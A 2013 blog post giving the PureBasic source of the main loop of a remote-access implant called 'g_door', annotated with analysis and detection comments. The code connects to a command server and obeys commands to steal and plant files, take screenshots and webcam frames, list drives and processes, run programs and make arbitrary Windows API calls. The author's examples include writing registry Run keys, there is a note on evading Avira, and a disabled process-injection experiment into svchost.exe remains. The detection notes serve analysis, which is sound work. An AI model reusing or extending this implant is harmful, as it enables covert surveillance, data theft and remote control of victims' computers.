2013年6月18日 星期二

g_door loop



; Main client loop of the "g_door" remote-access implant (analysis notes).
;
; Outer loop: connect out to #domain:#port, run one session, wait #delaytime1,
; then try again, forever. The host always initiates; nothing here listens.
;
; Session state is kept in `status`:
;    0 = idle, incoming data is treated as an encrypted command
;    1 = a file is being sent to the peer (started by "get")
;    2 = a file is being received from the peer (started by "put")
;   -1 = set when the idle timeout fires
;
; Commands are a 3-character verb, one separator character, then arguments,
; terminated by #endstr. Arguments are taken with Mid(cmdstr,5).
;
; #domain, #port, #pass, #endstr, #delaytime1, #delaytime2, #ver, #hash, #sup_cmd,
; SendAes, AesDec, apicall and the capture/listing helpers are defined outside
; this listing, so their exact behaviour cannot be confirmed from here.
;
; Traits useful for detection and triage that are visible in this listing:
;   - first message after every connect is "pas"+#pass+#endstr
;   - an idle keep-alive "000"+#endstr is sent after 1000 event-less passes
;   - file chunks are AES-encoded with a 128-bit key and an IV taken from the
;     ?Key / ?InitializationVector data labels, i.e. constants compiled into the
;     binary and reused for every chunk, so captured traffic is decryptable once
;     a sample is available
;   - "pak" stages data in <temp dir>\~HHMMSS.tmp and deletes it after transfer
;   - NOTE(review): if SendAes uses the same fixed key/IV, the "pas" and "000"
;     messages are presumably byte-constant per build; confirm against SendAes
Repeat
  ; Outbound connection; a zero result means the connect failed (see Else at the bottom).
  ConnectionID.l = OpenNetworkConnection(#domain, #port)
  If  ConnectionID  
    Debug("Connect to Server")
    Debug ConnectionID
    status=0
    ; Check-in: announces the build's #pass value to the peer right after connecting.
    SendAes("pas"+#pass+#endstr)
    ; Inner loop = one session; runs until quit=1 (disconnect or idle timeout).
    Repeat 
     
      SEvent = NetworkClientEvent(ConnectionID)
      If SEvent       
      
        ; Any network event resets the idle counter.
        timer=0
        Select SEvent
          Case #PB_NetworkEvent_Data                      
            ; At most 8192 bytes are read per event into *Buffer.
            reclen=ReceiveNetworkData(ConnectionID.l, *Buffer, 8192)
           
            Select status
              Case 1
                ; Upload in progress: every packet from the peer acts as an
                ; acknowledgement that triggers the next chunk; its content is not inspected.
                If Eof(filehandle)               
                  CloseFile(filehandle)
                  status=0
                 
                  ; Staged files (img=1: screenshot, webcam frame, pack archive) are
                  ; removed once sent, but only if they live in the temp directory.
                  If img=1 And GetPathPart(filepath)=GetTemporaryDirectory()
                    DeleteFile(filepath)
                    img=0
                  EndIf
                  filepath=""
               
              Else
                ;Debug reclen
                ;readlen=ReadData(filehandle,*Buffer2+3,1457)
                ; Next chunk: up to 8192 bytes, encoded with the compiled-in key/IV.
                ; The cipher mode argument is omitted, so PureBasic's default applies.
                readlen=ReadData(filehandle,*Buffer2,8192)
                AESEncoder(*Buffer2, @Aes\Data(), readlen, ?Key, 128, ?InitializationVector)
                SendNetworkData(ConnectionID,@Aes\Data(),readlen)
                ;SendNetworkData(ConnectionID,*Buffer2,readlen)
               
               
                EndIf
              Case 2
                ; Download in progress: received bytes are accumulated in *Buffer2 until a
                ; full 8192-byte chunk, or the final partial chunk, is available.
                ; NOTE(review): no check is visible that buflen+reclen fits *Buffer2; its
                ; allocation is outside this listing.
               
                CopyMemory(*Buffer,*Buffer2+buflen,reclen)
                buflen=buflen+reclen
                ;Debug buflen
                Delay(1)
               
                If buflen=8192 Or nowfilesize+buflen=FileSize
                  nowfilesize=nowfilesize+buflen
                  ; Chunk is decoded with the same fixed key/IV and written to disk.
                  AESDecoder(*Buffer2, @Aes\Data(), buflen, ?Key, 128, ?InitializationVector)
                  WriteData(filehandle, @Aes\Data(), buflen)
                  buflen=0
                  If nowfilesize=FileSize
                    ; Announced size reached: the file is complete, back to command mode.
                    CloseFile(filehandle)
                    nowfilesize=0
                   
                    status=0
                  Else
                    ; Per-chunk acknowledgement asking the peer for the next chunk.
                    SendAes("ok!"+#endstr)
                  EndIf
                EndIf
              Default
                ; Command mode: packets shorter than 16 bytes are ignored; anything else
                ; is decrypted by AesDec and accepted only if it ends with #endstr and
                ; is longer than 5 characters.
                Debug PeekS(*Buffer,reclen)
                ;Debug   AesDec(*Buffer,reclen)
                If reclen >=16
                cmdstr.s=AesDec(*Buffer,reclen)               
                ;If PeekS(*Buffer+reclen-2,2) = #endstr And reclen > 5
                ; Mid() without a length returns the last two characters here, so #endstr
                ; is presumably a 2-character terminator; confirm against its definition.
                If Mid(cmdstr,Len(cmdstr)-1) = #endstr And Len(cmdstr) > 5
                  Debug cmdstr+"<-"
                  command.l=1
                EndIf
                EndIf
            EndSelect
          Case #PB_NetworkEvent_Disconnect
            ; Peer closed the connection: leave the session loop and reconnect later.
            Debug("disconnect")
            Quit = 1
           
        EndSelect
       
     
      If command
      
        ; Only the last #endstr-terminated field of the packet is dispatched.
        cmdstr.s=StringField(cmdstr, CountString( cmdstr, #endstr), #endstr)
        Debug cmdstr
        ; Dispatch on the 3-character verb. Every path and argument below comes
        ; from the peer and is used as received.
        Select Mid(cmdstr,1,3)
          Case "get"
            ; File exfiltration: open the requested path and send the first encoded
            ; chunk; the remaining chunks are sent from the status=1 branch above.
            filepath=Mid(cmdstr,5)      
            filehandle= ReadFile(#PB_Any,filepath)
            If filehandle
              readlen=ReadData(filehandle,*Buffer2,8192)
              AESEncoder(*Buffer2, @Aes\Data(), readlen, ?Key, 128, ?InitializationVector)
              SendNetworkData(ConnectionID,@Aes\Data(),readlen)
             
              status=1
            Else              
              SendAes("errfile,can't read file"+#endstr)             
            EndIf
          Case "put"
            ; File drop: argument is "path|size". The file is created at the given
            ; path and the announced size decides when the transfer is complete.
            cmdstr=Mid(cmdstr,5)
            Debug StringField(cmdstr,1,"|")
            filehandle=CreateFile(#PB_Any,StringField(cmdstr,1,"|"))
            filesize=Val(StringField(cmdstr,2,"|"))
            buflen=0
            If filehandle             
             
              status=2
              SendAes("ok!"+#endstr)
             
            Else              
              SendAes("errfile,can't create file"+#endstr)             
            EndIf
          Case "pak"
            ; Staging: packs the requested path into <temp dir>\~HHMMSS.tmp and reports
            ; "name|size" to the peer. img=1 marks the archive for deletion once it
            ; has been fetched. The ~HHMMSS.tmp name is a host artefact to look for.
            filepath=Mid(cmdstr,5) 
            file.s=GetTemporaryDirectory()+"~"+FormatDate("%hh%ii%ss", Date())+".tmp"
            CreatePack(file)
            AddPackFile(filepath,9)           
            ClosePack()
            file=file+"|"+Str(FileSize(file))
            SendAes("pak"+file+#endstr)
            img=1
          Case "img"
            ; Screenshot: CaptureScreen() returns a file name (empty on failure), which
            ; is reported as "img"+name|size and marked for deletion after transfer.
            file.s=CaptureScreen()
            If file<>""
              file=file+"|"+Str(FileSize(file))
              SendAes("img"+file+#endstr) 
              img=1
            EndIf
          Case "cam"
            ; Webcam frame: same reporting as "img"; CapWebcam returns "no" or an empty
            ; string when no frame is available.
            file.s=CapWebcam(1)
            If file <> "" And file <> "no"
              file=file+"|"+Str(FileSize(file))
              SendAes("img"+file+#endstr) 
              img=1
            EndIf
           
          Case "drv"
            ; Drive enumeration: reply is "drv" followed by "letter:volume|" entries.
            GetAllDrives(Drive())
            drvstr.s="drv"
            ForEach Drive()
              drvstr.s=drvstr+Drive()\DriveLetter$  + ":" + Trim(Drive()\Volume$)+"|"
            Next
            SendAes(drvstr+#endstr)         
            Debug drvstr+"->"           
            ClearList(Drive())
          Case  "dir"
            ; Directory listing: reply is "dir" followed by "name:size:type|" entries.
            ListFile(Dir(),Mid(cmdstr,5))
            dirstr.s="dir"
            ForEach Dir()
              dirstr=dirstr+Dir()\Name$  + ":" + Dir()\Size$+ ":" + Str(Dir()\DirType)+"|"
            Next
           
            ; Listings of 8187 characters or more are refused rather than split;
            ; presumably this keeps the message within the 8192-byte buffers.
            If Len(dirstr)<8187
             
              SendAes(dirstr+#endstr)
              Debug dirstr+"->"
             
            Else
              SendAes("errdir,too many data"+#endstr)
            EndIf
            ClearList(Dir())
           
          Case "del"
            ; Deletes the given path and reports success or failure.
            If DeleteFile(Mid(cmdstr,5))=0
             
              SendAes("errdel,can't delete file"+#endstr)
            Else
              SendAes("del"+#endstr)
             
            EndIf 
           
            Debug "del->"
          Case "cpy"           
            ; Copies "source|destination"; no result is reported to the peer.
           
            CopyFile(StringField(Mid(cmdstr,5),1,"|"),StringField(Mid(cmdstr,5),2,"|"))
           
          ; Program execution. The RunProgram variant below is disabled and carries the
          ; author's note that Avira detected it; the live path reaches ShellExecuteA
          ; through the generic apicall helper and treats a result above 32 as success.
          Case "exe" ;kill by avira
            ;             If RunProgram(Mid(cmdstr,5))=0
            ;               SendNetworkString(ConnectionID,"errexe,can't execute file"+#endstr)
            ;             Else
            ;               SendNetworkString(ConnectionID,"exe"+#endstr);              
            ;             EndIf
            ;             Debug "del->"
           
            If Val(StringField(apicall("6|Shell32.dll|ShellExecuteA|0|0|@"+Mid(cmdstr,5)+"|0|0|1"),1,"|"))>32
              SendAes("exe"+#endstr)
            Else
              SendAes("errexe,can't execute file"+#endstr)
            EndIf
           
          Case "kil"
            ; Process kill is disabled in this build; only the debug line remains.
;             If PurePROCS_KillProcessID(Val(Mid(cmdstr,5)))=0
;               SendAes("errkil,can't kill process"+#endstr)
;             Else
;               SendAes("kil"+#endstr)            
;             EndIf
            Debug "kil->"
           
;           Case "pas"
;             SendNetworkString(ConnectionID,"pas"+#pass+#endstr)
;             Debug "pas"+#pass+#endstr+"->"
          Case "inf"
            ; Host profile sent to the peer: computer name, user name, the `os` and `av`
            ; strings (set elsewhere; presumably OS version and installed antivirus),
            ; the implant's own path, #ver, #hash and whether a webcam is present.
            inf.s="inf"
            buf.s=Space(256)
            buflen.l=256
            GetComputerName_(@buf,@buflen)
            inf=inf+buf+"|"
            GetUserName_(@buf,@buflen)
            inf=inf+buf+"|"
            inf=inf+os             
            inf=inf+av+ProgramFilename()+"|"+#ver+"|"+#hash+"|"
            If CapWebcam(0)="no"
              inf=inf+"no"+"|"
            Else
              inf=inf+"yes"+"|"
            EndIf 
            SendAes(inf+#endstr)          
           
          Case "chd"
            ; Changes the process working directory to the given path.
            SetCurrentDirectory_(Mid(cmdstr,5))         
           
           
          Case "api"
            ; Generic API call: the peer's argument string goes to apicall unchanged and
            ; the result is returned. The author's examples below show the format
            ; (argument count|DLL|export|arguments) and include registry Run-key
            ; writes, so this verb covers behaviour that has no dedicated verb of its own.
           
            ;s: output string, v: output value
            ;api USER32.DLL|MessageBoxA|0|hello world 1|test|0
            ;Debug apicall("4|USER32.DLL|MessageBoxA|0|@hello world 1|@test|0")
            ;Debug apicall("2|Kernel32.dll|GetWindowsDirectoryA|s|512")
            ;Debug apicall("2|Kernel32.dll|GetTempPathA|512|s")
            ;Debug apicall("3|Advapi32.dll|RegOpenKeyA|2147483650|@SOFTWARE\Microsoft\Windows\CurrentVersion\Run|v")
            ;Debug apicall("6|Advapi32.dll|RegSetValueExA|handle_number|@WindowsInit|0|1|@c:\windows\test.exe|19")
            ;Debug apicall("6|Shell32.dll|ShellExecuteA|0|0|@notepad.exe|0|0|1") 
            ;debug apicall("2|Kernel32.dll|GetComputerNameA|s|v256")
            SendAes("api"+apicall(Mid(cmdstr,5))+#endstr)
           
          Case "prs"
            ; Process listing: reply is "prs" followed by "path&pid&module|" entries,
            ; with the same 8187-character limit as "dir".
            ;Debug "process"
            ;ListProcess(Process())
            GetProcessList(Process())
            procstr.s="prs"
            ForEach Process()
              ;drvstr.s=drvstr+Drive()\DriveLetter$  + ":" + Trim(Drive()\Volume$)+"|"
              procstr=procstr+Process()\path + "&" + Process()\pid + "&" + Process()\module + "|"
            Next
            If Len(procstr)<8187
              SendAes(procstr+#endstr)
              Debug procstr+"->"             
            Else
              SendAes("errprs,too many data"+#endstr)
            EndIf
            ClearList(Process())
          Case "sup"
            ; Replies with the compiled-in #sup_cmd string; its content is not visible here.
            SendAes(#sup_cmd+#endstr)
         
        EndSelect
       
        ; Overwrite the start of the receive buffer and clear the command flag so the
        ; same command is not dispatched twice.
        PokeS(*Buffer,"   ")
        timer=0
        command=0
       
      EndIf
     
      Else
     
      ; No network event on this pass: count idle passes. With the Delay(1) at the
      ; end of the loop each pass takes at least about one millisecond.
      timer=timer+1
;       If timer % 1000=0
;         Debug ".."
;        EndIf
      If status=0
       
        ; Keep-alive, sent once per idle period when the counter reaches exactly 1000.
        If timer=1000
;             AesEnc("000"+#endstr)
;             SendNetworkData(ConnectionID,@Aes\Data(),Aes\len)
            SendAes("000"+#endstr)
         
        EndIf       
  
      EndIf
      
      ; Idle timeout: after #delaytime2 event-less passes the peer is considered
      ; gone; the connection and any open transfer file are closed and the
      ; session loop ends.
      If timer=#delaytime2
        Debug("server die")
        Debug timer
        CloseNetworkConnection(ConnectionID)
        timer=0
        quit=1
       
       
       
        status=-1
        If IsFile(filehandle)
          CloseFile(filehandle)
                
        EndIf       
      EndIf
    EndIf
    Delay(1)
    Until quit=1
    quit=0
   
  Else
    Debug("can not Connect to Server")
  EndIf 
  ; Fixed pause between connection attempts, so outbound attempts to #domain:#port
  ; recur at a regular interval whether or not the last session succeeded.
  Delay(#delaytime1)
 
  ; Disabled experiment left by the author; none of the lines below execute.
  ;   If para<>""
  ;     RenameFile("c:\"+para,"c:\winlogin.exe")
  ;    
  ;     para=""
  ;     Stream = ReadFile(#PB_Any, GetEnvironmentVariable("windir") + "\notepad.exe")
  ;     If Stream
  ;       *Buffer = AllocateMemory(Lof(Stream))
  ;       If *Buffer
  ;         ReadData(Stream, *Buffer, Lof(Stream))
  ;         CloseFile(Stream)
  ;         ProcessID = PurePROCS_Execute("c:\windows\system32\svchost.exe", *Buffer)
  ;         Delay(10000)
  ;         PurePROCS_KillProcessID(ProcessID)
  ;         ProcessID = PurePROCS_Execute("c:\windows\system32\svchost.exe", *Buffer)
  ;         Delay(10000)
  ;         PurePROCS_KillProcessID(ProcessID)
  ;       EndIf
  ;     EndIf
  ;   EndIf
ForEver
